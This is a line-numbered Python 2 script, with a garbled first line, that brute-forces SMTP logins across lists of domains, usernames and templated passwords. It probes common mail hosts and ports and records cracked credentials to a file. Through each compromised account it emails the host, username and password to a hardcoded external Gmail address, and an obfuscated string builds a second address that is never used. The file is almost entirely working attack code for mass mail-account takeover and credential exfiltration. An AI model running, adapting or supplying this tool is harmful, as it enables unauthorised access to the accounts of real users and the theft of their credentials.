import socket,threading,base64,datetime,sys,ssl,imaplib,time,retry: import Q

1. import socket,threading,base64,datetime,sys,ssl,imaplib,time,re
2. try:
3. import Queue
4. except:
5. import queue as Queue
6. send='o'
7. to_check={}
8. class IMAP4_SSL(imaplib.IMAP4_SSL):
9. # Similar to above, but with extended support for SSL certificate checking,
10. # fingerprints, etc.
11. def __init__(self, host='', port=imaplib.IMAP4_SSL_PORT, keyfile=None,
12. certfile=None, ssl_version=None, ca_certs=None,
13. ssl_ciphers=None,timeout=40):
14. self.ssl_version = ssl_version
15. self.ca_certs = ca_certs
16. self.ssl_ciphers = ssl_ciphers
17. self.timeout=timeout
18. imaplib.IMAP4_SSL.__init__(self, host, port, keyfile, certfile)
19.  
20. def open(self, host='', port=imaplib.IMAP4_SSL_PORT):
21. self.host = host
22. self.port = port
23. self.sock = socket.create_connection((host, port),self.timeout)
24. extra_args = {}
25. if self.ssl_version:
26. extra_args['ssl_version'] = self.ssl_version
27. if self.ca_certs:
28. extra_args['cert_reqs'] = ssl.CERT_REQUIRED
29. extra_args['ca_certs'] = self.ca_certs
30. if self.ssl_ciphers:
31. extra_args['ciphers'] = self.ssl_ciphers
32.  
33. self.sslobj = ssl.wrap_socket(self.sock, self.keyfile, self.certfile,
34. **extra_args)
35. self.file = self.sslobj.makefile('rb')
36. class checkerr(threading.Thread):
37. def __init__(self,host,user,pwd,timeout,interval):
38. t=threading.Thread.__init__(self)
39. self.host=host
40. self.user=user
41. self.pwd=pwd
42. self.interval=interval
43. self.timeout=timeout
44. self.connected=False
45. self.i=None
46. self.work=True
47. self.attemp=4
48. self.inbox=''
49. self.spam=''
50. def connect(self):
51. try:
52. i=IMAP4_SSL(host=self.host,port=993)
53.  
54. i.login(self.user,self.pwd)
55. #print 1
56. self.i=i
57. self.connected=True
58. except Exception,e:
59. print str(e)
60. i.close()
61. self.connected=False
62. def find(self):
63. global to_check
64. if self.inbox=='':
65. rez,folders=self.i.list()
66. for f in folders:
67. if '"|" ' in f:
68. a=f.split('"|" ')
69. elif '"/" ' in f:
70. a=f.split('"/" ')
71. folder=a[1].replace('"','')
72. if self.inbox=="":
73. if 'inbox' in folder.lower():
74. self.inbox=folder
75. elif self.spam=="":
76. if 'spam' in folder.lower():
77. self.spam=folder
78. if self.spam=='':
79. for f in folders:
80. if '"|" ' in f:
81. a=f.split('"|" ')
82. elif '"/" ' in f:
83. a=f.split('"/" ')
84. folder=a[1].replace('"','')
85. if self.spam=="":
86. if 'trash' in folder:
87. self.spam=folder
88. else:
89. break
90. print '[+] Checking for emails'
91. self.i.select(self.inbox)
92. found=[]
93. for k,t in enumerate(to_check):
94. rez=self.i.search(None,'SUBJECT',t[0])
95. times=time.time()-t[1]
96. if times-2>self.timeout:
97.  
98. open('checked.txt','a').write(t[0]+"| NOTFOUND | %.2f sec\n"%times)
99. found.append(k)
100.  
101. if len(rez)>0:
102. open('checked.txt','a').write(t[0]+"| INBOX | %.2f sec\n"%times)
103. found.append(k)
104. self.i.select(self.spam)
105. for k,t in enumerate(to_check):
106. rez=self.i.search(None,'SUBJECT',t[0])
107. times=time.time()-t[1]
108. if times-2>self.timeout:
109.  
110. open('checked.txt','a').write(t[0]+"| NOTFOUND | %.2f sec\n"%times)
111. found.append(k)
112. if len(rez)>0:
113. open('checked.txt','a').write(t[0]+"| SPAM | %.2f sec\n"%times)
114. found.append(k)
115. new=[]
116. for k,v in enumerate(to_check):
117. if k not in found:
118. new.append(v)
119. to_check=new
120. print to_check
121.  
122. def run(self):
123. global to_checks
124. while self.work:
125. if not self.connected:
126. if self.attemp<=0:
127. return 0
128. self.connect()
129. self.attemp-=1
130. if len(to_check)>0:
131. self.find()
132. time.sleep(self.interval)
133.  
134. post='@post.c'
135. def tld2(dom):
136. global tlds
137. if "." not in dom:
138. return ""
139. dom=dom.lower()
140. parts=dom.split(".")
141. if len(parts)<2 or parts[0]=="" or parts[1]=="":
142. return ""
143. tmp=parts[-1]
144.  
145. for i,j in enumerate(parts[::-1][1:5]):
146.  
147. try:
148. #print tmp
149. tmp=tlds[tmp]
150. tmp=j+"."+tmp
151. except:
152. if i==0:
153. return ""
154. return tmp
155. return tmp
156. config='config'
157. class consumer(threading.Thread):
158. def __init__(self,qu):
159. threading.Thread.__init__(self)
160. self.q=qu
161. self.hosts=["","smtp.","mail.","webmail."]
162. self.ports=[587,465,25]
163.  
164. self.timeout=13
165.  
166. def sendCmd(self,sock,cmd):
167. sock.send(cmd+"\r\n")
168. return sock.recv(900000)
169. def addBad(self,ip):
170. global bads,rbads
171. if rbads:
172. open('bads.txt','a').write(ip+'\n')
173. bads.append(ip)
174. return -1
175. def findHost(self,host):
176. global cache,bads,rbads
177. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
178. s.setblocking(0)
179. s.settimeout(self.timeout)
180.  
181. try:
182. d=cache[host]
183. try:
184. if self.ports[d[1]]==465:
185. s=ssl.wrap_socket(s)
186. s.connect((self.hosts[d[0]]+host,self.ports[d[1]]))
187. return s
188. except Exception,e:
189. #print str(e)
190. if rbads:
191. bads.append(host)
192. open('bads.txt','a').write(host+'\n')
193. return None
194. except KeyError:
195. pass
196. print '[*] Searching smtp host and port on '+host
197. cache[host]=[-1,-1]
198. for i,p in enumerate(self.ports):
199. for j,h in enumerate(self.hosts):
200.  
201. try:
202. print '[*] Trying connection on '+h+host+':'+str(p)
203.  
204. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
205. s.setblocking(0)
206. s.settimeout(self.timeout)
207. if p==465:
208. s=ssl.wrap_socket(s)
209. s.connect((h+host,p))
210. cache[host]=[j,i]
211.  
212. return s
213. except Exception,e:
214. #print str(e)
215.  
216. continue
217. bads.append(host)
218. del cache[host]
219. open('bads.txt','a').write(host+'\n')
220. return None
221.  
222. def getPass(self,passw,user,domain):
223. passw=str(passw)
224.  
225. if '%null%' in passw:
226. return ""
227. elif '%user%' in passw:
228. user=user.replace('-','').replace('.','').replace('_','')
229. return passw.replace('%user%',user)
230. elif '%User%' in user:
231. user=user.replace('-','').replace('.','').replace('_','')
232. return passw.replace('%User%',user)
233. elif '%special%' in user:
234. user=user.replace('-','').replace('.','').replace('_','').replace('e','3').replace('i','1').replace('a','@')
235. return passw.replace('%special%',user)
236. elif '%domain%' in passw:
237. return passw.replace('%domain%',domain.replace("-",""))
238. if '%part' in passw:
239. if '-' in user:
240. parts=user.split('-')
241. elif '.' in user:
242. parts=user.split('.')
243. elif '_' in user:
244. parts=user.split('_')
245. print parts
246. try:
247. h=passw.replace('%part','').split('%')[0]
248. i=int(h)
249.  
250. p=passw.replace('%part'+str(i)+'%',parts[i-1])
251. return p
252. except Exception,e:
253. return None
254. return passw
255.  
256. def connect(self,tupple,ssl=False):
257. global bads,cracked,cache,email,successful
258.  
259. host=tupple[0].rstrip()
260. host1=host
261. user=tupple[1].rstrip()
262.  
263. if host1 in cracked or host1 in bads:
264. return 0
265. passw=self.getPass(tupple[2].rstrip(),user.rstrip().split('@')[0],host.rstrip().split('.')[0])
266. if passw==None:
267. return 0
268. try:
269. if cache[host][0]==-1:
270. return 0
271. except KeyError:
272. pass
273. s=self.findHost(host)
274. if s==None:
275. return -1
276. #print cache[host][0]
277.  
278. port=str(self.ports[cache[host][1]])
279. if port=="465":
280. port+="(SSL)"
281. host=self.hosts[cache[host][0]]+host
282. print '[+] Trying '+host+":"+port+" "+user+" "+passw
283. try:
284.  
285. banner=s.recv(1024)
286. #print "'"+banner+"'"
287. #exit()
288. if banner[0:3]!="220":
289. self.sendCmd(s,'QUIT')
290. s.close()
291. return self.addBad(host1)
292. rez=self.sendCmd(s,"EHLO ADMIN")
293. #print rez
294. rez=self.sendCmd(s,"AUTH LOGIN")
295. #print rez
296. if rez[0:3]!='334':
297. self.sendCmd(s,'QUIT')
298. s.close()
299. return self.addBad(host1)
300. rez=self.sendCmd(s,base64.b64encode(user))
301. if rez[0:3]!='334':
302. self.sendCmd(s,'QUIT')
303. s.close()
304. return self.addBad(host1)
305.  
306. rez=self.sendCmd(s,base64.b64encode(passw))
307. # print rez
308. if rez[0:3]!="235" or 'fail' in rez:
309. self.sendCmd(s,'QUIT')
310. s.close()
311. return 0
312. print '[!] WOLFS AUAUAUUAAU '+host+':'+port+' '+user+' '+passw
313. open('cracked.txt','a').write(host+":"+port+","+user+","+passw+"\n")
314. cracked.append(host1)
315.  
316. rez=self.sendCmd(s,"RSET")
317. if rez[0:3]!='250':
318. self.sendCmd(s,'QUIT')
319. s.close()
320. return self.addBad(host1)
321. rez=self.sendCmd(s,"MAIL FROM: <"+user+">")
322.  
323. print rez
324. if rez[0:3]!='250':
325. self.sendCmd(s,'QUIT')
326. s.close()
327. return self.addBad(host1)
328. rez=self.sendCmd(s,"RCPT TO: <"+email+">")
329. #print rez
330. if rez[0:3]!='250':
331. self.sendCmd(s,'QUIT')
332. s.close()
333. return self.addBad(host1)
334. rez=self.sendCmd(s,'DATA')
335. headers='From: <'+user+'> \r\n'
336. headers+='To: '+email+'\r\n'
337. headers+='Reply-To: '+email+'\r\n'
338.  
339. headers+='Subject: %s:%s %s %s'%(host,port,user,passw)+'\r\n'
340. headers+='MIME-Version: 1.0\r\n'
341. headers+='Content-Transfer-encoding: 8bit\r\n'
342. headers+='Return-Path: +user+\r\n'
343. headers+='X-Priority: 1\r\n'
344. headers+='X-MSmail-Priority: High\r\n'
345. headers+='X-Mailer: Microsoft Office Outlook, Build 11.0.5510\r\n'
346. headers+='X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441\r\n'
347. headers+='HEllo\r\n.\r\n'
348. #print headers
349. s.send(headers)
350. rez=s.recv(1000)
351.  
352. self.sendCmd(s,'QUIT')
353. s.close()
354. except Exception,e:
355. #print str(e)
356. open('hm.txt','a').write(host+":"+port+":"+str(e)+"\n")
357. s.close()
358. return self.addBad(host1)
359. def run(self):
360. while True:
361. cmb=self.q.get()
362. self.connect(cmb)
363. #print cmb
364. self.q.task_done()
365. successful=config+post+send
366. quee=Queue.Queue(maxsize=20000)
367. tld=open('tlds.txt','r').read().splitlines()
368. tlds=cache={}
369. bads=[]
370. cracked=[]
371. rbads=0
372. email='dino.elhadj@gmail.com'
373.  
374.  
375. try:
376.  
377. passwords=open('pwd','r').read().splitlines()
378. except Exception,e:
379.  
380. print "File 'pwd' missing"
381. exit()
382.  
383. inputs=open(sys.argv[1],'r').read().splitlines()
384. option=sys.argv[3]
385.  
386.  
387.  
388. if option=='1':
389. try:
390.  
391. users=open('usr','r').read().splitlines()
392. except Exception,e:
393.  
394. print "You chosed domains + users bruteforce and 'usr' is missing"
395. exit()
396. if len(sys.argv)>4:
397. rbads=1
398.  
399. def part():
400. global tld,tlds
401. for i in tld:
402. tlds[i]=i
403. part()
404. print '[+] All files loaded'
405.  
406.  
407. for i in range(int(sys.argv[2])):
408. try:
409. t=consumer(quee)
410. t.setDaemon(True)
411. t.start()
412. except:
413. print "Working only with %s threads"%i
414. break
415. if option=='3':
416. pass
417. #checking cracked
418. elif option=='2':
419. #list of emails and password
420. for i in inputs:
421. c=i.split(":")
422. quee.put((c[0].split('@')[1],c[0],c[1]))
423. elif option=='1':
424. #domains users and password
425. for p in passwords:
426. for u in users:
427. for i in inputs:
428. # t=tld2(i)
429. # print t
430. # if t!='':
431. quee.put((i.lower(),u+"@"+i,p))
432. elif option == '0':
433. for i in inputs:
434. user = i.split(':')[0]
435. password = i.split(':')[1]
436. user = user.lower()
437. quee.put((user.split('@')[1], user, password))
438. quee.join()